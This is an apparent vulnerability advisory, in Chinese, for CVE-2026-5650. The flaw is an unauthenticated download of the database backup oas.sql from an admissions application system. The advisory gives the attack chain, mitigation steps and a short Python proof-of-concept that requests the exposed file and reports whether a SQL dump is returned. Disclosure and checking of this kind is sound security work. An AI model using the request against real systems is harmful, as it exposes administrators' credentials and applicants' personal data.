CVE-2026-5650 在线申请系统敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2026-5650

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

code-projects Online Application System for Admission

漏洞概述

CVE-2026-5650 是 code-projects Online Application System for Admission 1.0 中发现的一个安全漏洞。该漏洞源于系统对敏感文件存储不当，具体涉及 /enrollment/database/oas.sql 文件。攻击者可利用此漏洞远程访问并下载包含敏感信息的数据库备份文件。由于无需用户交互和认证，攻击者可轻易获取系统内部数据，导致信息泄露。目前相关利用代码已公开，建议用户尽快采取措施。

技术细节

该漏洞的成因在于 Web 服务器配置不当或应用逻辑缺陷，导致位于网站根目录或可访问目录下的数据库备份文件 oas.sql 没有受到适当的访问控制保护。在正常的系统架构中，数据库备份文件应存储在 Web 根目录之外，或者通过严格的身份验证机制进行保护。然而，在该产品的 1.0 版本中，攻击者可以通过构造特定的 HTTP GET 请求，直接访问 /enrollment/database/oas.sql 路径。由于该文件通常包含数据库的完整结构和所有数据（如管理员凭据、用户个人信息等），一旦被下载，攻击者可以离线分析这些数据，进一步提取敏感信息或利用凭证登录系统。该漏洞属于典型的敏感信息泄露漏洞，利用门槛极低，危害性主要取决于备份数据的敏感程度。

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行的是 code-projects Online Application System for Admission 1.0，并确定其 Web 服务架构。

STEP 2

资源探测

攻击者根据已知的漏洞信息，尝试直接访问系统特定路径 /enrollment/database/oas.sql。

STEP 3

漏洞利用

由于服务器未限制对该文件的访问，Web 服务器直接响应请求，将数据库备份文件发送给攻击者。

STEP 4

数据渗出

攻击者下载 oas.sql 文件，并在本地打开分析，提取其中的敏感数据，如用户账号、密码哈希或个人信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def check_vulnerability(target_url):
    """
    Check if the target is vulnerable to CVE-2026-5650.
    Attempts to access the exposed database backup file.
    """
    # The vulnerable path mentioned in the CVE description
    vulnerable_path = "/enrollment/database/oas.sql"
    full_url = f"{target_url.rstrip('/')}{vulnerable_path}"
    
    try:
        response = requests.get(full_url, timeout=10)
        
        # Check if the request was successful and looks like a SQL file
        if response.status_code == 200:
            content_type = response.headers.get('Content-Type', '')
            # Basic heuristics to verify it's likely a database dump
            if 'text' in content_type or 'sql' in content_type or 'CREATE TABLE' in response.text[:500]:
                print(f"[+] Potential Vulnerability Found at: {full_url}")
                print(f"[+] Content-Type: {content_type}")
                print(f"[+] Response Size: {len(response.text)} bytes")
                print("[!] Sensitive data may have been exposed.")
                return True
        else:
            print(f"[-] File not accessible or does not exist (Status: {response.status_code})")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")
        return False

if __name__ == "__main__":
    # Example usage
    target = "http://localhost" # Replace with actual target
    check_vulnerability(target)

影响范围

code-projects Online Application System for Admission 1.0

防御指南

临时缓解措施

建议管理员立即检查服务器 /enrollment/database/ 目录下是否存在 oas.sql 文件并将其删除。同时，应审查所有 Web 可访问目录，确保没有遗留的测试文件、备份文件或配置文件暴露。在未进行安全审计之前，建议限制该系统的公网访问。